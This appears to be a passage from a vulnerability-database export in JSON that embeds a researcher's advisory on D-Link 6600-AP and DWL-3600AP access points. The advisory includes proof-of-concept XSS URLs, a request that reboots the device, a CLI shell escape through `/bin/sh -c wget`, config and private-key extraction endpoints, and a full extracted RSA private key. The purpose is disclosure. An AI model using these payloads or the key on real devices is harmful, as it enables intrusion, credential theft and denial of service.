"data": "An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is an ability to escape to a shell in the restricted command line interface, as demonstrated by the `/bin/sh -c wget` sequence. D-Link 6600-AP and DWL-3600AP Devices have vulnerabilities related to authorization, permissions, and access control.Information may be obtained. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. There are currently no detailed details of the vulnerability provided. D-Link 6600-AP and DWL-3600AP version 4.2.0.14 has a permission and access control issue vulnerability. An attacker could exploit this vulnerability to gain access to a restricted CLI shell. # Security Advisory - 22/07/2019\n\n## Multiple vulnerabilities found in the D-Link 6600-AP device running\nthe latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced\nanymore but the support is still provided by D-Link as per described\non the D-Link website. Not that this product is built for business\ncustomers of D-Link and we can expect to have thousands of devices at\nrisk. Code base shared with DWL-3600AP and DWL-8610AP\n\n### This advisory is sent to D-Link the 22/05/2019\nMany Thanks to the D-Link Security Team for their prompt reactivity!\n\n### Affected Product\nD-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP\n\n### Firmware version\n4.2.0.14 Revision Ax date: 21/03/2019\n\n### Last version available\nhttps://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n### Product Identifier\nWLAN-EAP\n\n### Hardware Version\nA2\n\n### Manufacturer\nD-LINK\n\n## Product Description\nThe DWL-6600AP is designed to be the best-in-class indoor Access Point\nfor business environments. With high data transmission speeds, load\nbalancing features, it can be deployed as a standalone wireless Access\nPoint or used as the foundation for a managed wireless network. \nSource: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n## List of Vulnerabilities\n\n 1. CVE-2019-14338 - Post-authenticated XSS\n 2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private\nKey extraction\nthrough http command\n 3. CVE-2019-14333 - Pre-authenticated Denial of service leading to\nthe reboot of the AP\n 4. CVE-2019-14335 - Post-authenticated Denial of service leading to\nthe reboot of the AP\n 6. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)\n 7. CVE-2019-14332 - Use of weak ciphers for SSH\n\n### 1. Post-authenticated XSS\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14338\n#### Proof-of concept\n\nExample 1: http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\n\nExample 2: http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027Pwned\u0027)\u003c/script\u003e\n\n### 2. Post-authenticated Certificate and RSA Private Key extraction\nthrough http command\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14334\n#### Proof-of concept\n\nhttp://10.90.90.91/sslcert-get.cgi?\n\nResult of the command: File \"mini_httpd.pem\" automatically extracted\n\n-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee\nHk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o\nBioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B\nvsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t\n7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c\nunyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk\n1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6\nJ8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14\nyRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z\n0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc\nfmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB\ni5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb\ndAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ\nOztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ\nVuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9\nJ3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr\nH975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw\nuF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy\nyGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd\npagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co\npaZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8\n1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm\nfPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS\nokObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px\nbgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY\n-----END RSA PRIVATE KEY-----\n-----BEGIN CERTIFICATE-----\nMIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx\nMC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp\nbmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL\nMAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU\nMBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG\nA1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE\nCBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu\nOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB\nBQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp\nwRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC\nI+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW\n2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK\nYwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N\n29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B\nAQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS\n7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME\n9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5\nbeF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE\n45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef\nMjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ==\n-----END CERTIFICATE-----\n\n### 3. Pre-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID: CVE-2019-14333\n#### Proof-of concept\n kali# curl -X POST\n\u0027http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n### 4. \nDLINK-WLAN-AP# `/bin/sh -c wget`\nBusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. \nUsage: wget [-c|--continue] [-s|--spider] [-q|--quiet]\n[-O|--output-document FILE]\n [--header \u0027header: value\u0027] [-Y|--proxy on/off] [-P DIR]\n [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL\n\nRetrieve files via HTTP or FTP\n\nOptions:\n -s Spider mode - only check file existence\n -c Continue retrieval of aborted transfer\n -q Quiet\n -P DIR Save to DIR (default .)\n -T SEC Network read timeout is SEC seconds\n -O FILE Save to FILE (\u0027-\u0027 for stdout)\n -U STR Use STR for User-Agent header\n -Y Use proxy (\u0027on\u0027 or \u0027off\u0027)\n\nDLINK-WLAN-AP#\n\n### 5. Post-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14335\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=%s\n\n### 6. Post-authenticated Dump all the config files\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14336\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=\n\n### 7. Use of weak ciphers\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14332\n#### Proof-of concept\n\nroot@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1\nThe authenticity of host \u002710.90.90.91 (10.90.90.91)\u0027 can\u0027t be established. \nRSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. \nAre you sure you want to continue connecting (yes/no)? yes\nWarning: Permanently added \u002710.90.90.91\u0027 (RSA) to the list of known hosts. \nadmin@10.90.90.91\u0027s password:\nEnter \u0027help\u0027 for help. \n\nDLINK-WLAN-AP# help\n\n## Report Timeline\n22/05/2019 : This advisory is sent to D-Link - the contents of this\nReport will be made public within 30 days. \n22/06/2019 : Public release of the security advisory to mailing list\n\n## Fixes/Updates\nftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip\nftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip\n\n\n## About me - pwn.sandstorm@gmail.com\n#### Independent EMSecurity Researcher in the field of IoT under the Sun\n#### Always open to hack and share\n#### Greetings - Ack P. Kim and others for the online resources\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14337"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007493"
},
{
"db": "CNVD",
"id": "CNVD-2019-29141"
},
{
"db": "VULHUB",
"id": "VHN-146273"
},
{
"db": "PACKETSTORM",
"id": "153840"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "PACKETSTORM",
"id": "153840",
"trust": 3.2
},
{
"db": "NVD",
"id": "CVE-2019-14337",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007493",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1630",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-29141",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-146273",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29141"
},
{
"db": "VULHUB",
"id": "VHN-146273"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007493"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1630"
},
{
"db": "NVD",
"id": "CVE-2019-14337"
}
]
},
"id": "VAR-201908-0915",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29141"
},
{
"db": "VULHUB",
"id": "VHN-146273"
}
],
"trust": 1.3903846
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29141"
}
]
},
"last_update_date": "2024-11-23T21:52:00.695000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Bulletin",
"trust": 0.8,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"title": "Security Advisory",
"trust": 0.8,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"title": "D-Link 6600-AP and DWL-3600AP have unexplained patches",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/177601"
},
{
"title": "D-Link 6600-AP and DWL-3600AP Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=95740"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29141"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007493"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1630"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.1
},
{
"problemtype": "CWE-264",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-146273"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007493"
},
{
"db": "NVD",
"id": "CVE-2019-14337"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/153840/d-link-6600-ap-xss-dos-information-disclosure.html"
},
{
"trust": 1.7,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"trust": 1.7,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14337"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14337"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14336"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14332"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14335"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14333"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=%s"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027pwned\u0027)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14334"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/sslcert-get.cgi?"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14338"
},
{
"trust": 0.1,
"url": "https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action="
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29141"
},
{
"db": "VULHUB",
"id": "VHN-146273"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007493"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1630"
},
{
"db": "NVD",
"id": "CVE-2019-14337"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-29141"
},
{
"db": "VULHUB",
"id": "VHN-146273"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007493"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1630"
},
{
"db": "NVD",
"id": "CVE-2019-14337"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29141"
},
{
"date": "2019-08-01T00:00:00",
"db": "VULHUB",
"id": "VHN-146273"
},
{
"date": "2019-08-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007493"
},
{
"date": "2019-07-31T19:01:29",
"db": "PACKETSTORM",
"id": "153840"
},
{
"date": "2019-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1630"
},
{
"date": "2019-08-01T13:15:14.257000",
"db": "NVD",
"id": "CVE-2019-14337"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29141"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-146273"
},
{
"date": "2019-08-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007493"
},
{
"date": "2021-04-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1630"
},
{
"date": "2024-11-21T04:26:32.333000",
"db": "NVD",
"id": "CVE-2019-14337"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1630"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link 6600-AP and DWL-3600AP Vulnerabilities related to authorization, authority, and access control in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007493"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1630"
}
],
"trust": 0.6
}
}
VAR-201908-0910
Vulnerability from variot - Updated: 2024-11-23 21:52An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is use of weak ciphers for SSH such as diffie-hellman-group1-sha1. D-Link 6600-AP and DWL-3600AP The device contains a cryptographic strength vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. An attacker could exploit the vulnerability to brute force SSH passwords. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. # Security Advisory - 22/07/2019
Multiple vulnerabilities found in the D-Link 6600-AP device running
the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as per described on the D-Link website. Not that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP
This advisory is sent to D-Link the 22/05/2019
Many Thanks to the D-Link Security Team for their prompt reactivity!
Affected Product
D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP
Firmware version
4.2.0.14 Revision Ax date: 21/03/2019
Last version available
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
Product Identifier
WLAN-EAP
Hardware Version
A2
Manufacturer
D-LINK
Product Description
The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
List of Vulnerabilities
- CVE-2019-14338 - Post-authenticated XSS
- CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command
- CVE-2019-14333 - Pre-authenticated Denial of service leading to the reboot of the AP
- CVE-2019-14337 - Escape shell in the restricted command line interface
- CVE-2019-14335 - Post-authenticated Denial of service leading to the reboot of the AP
- CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)
- Post-authenticated XSS
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14338
Proof-of concept
Example 1: http://10.90.90.91/admin.cgi?action=alert(document.cookie)
Example 2: http://10.90.90.91/admin.cgi?action=+guestalert('Pwned')
2. Post-authenticated Certificate and RSA Private Key extraction
through http command
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14334
Proof-of concept
http://10.90.90.91/sslcert-get.cgi?
Result of the command: File "mini_httpd.pem" automatically extracted
-----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee Hk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o BioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B vsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t 7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c unyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk 1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6 J8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14 yRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z 0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc fmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB i5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb dAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ OztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ VuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9 J3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr H975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw uF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy yGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd pagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co paZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8 1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm fPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS okObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px bgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx MC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp bmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL MAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU MBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG A1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE CBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu OTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB BQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp wRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC I+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW 2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK YwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N 29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B AQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS 7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME 9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5 beF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE 45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef MjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ== -----END CERTIFICATE-----
3. Pre-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID: CVE-2019-14333
Proof-of concept
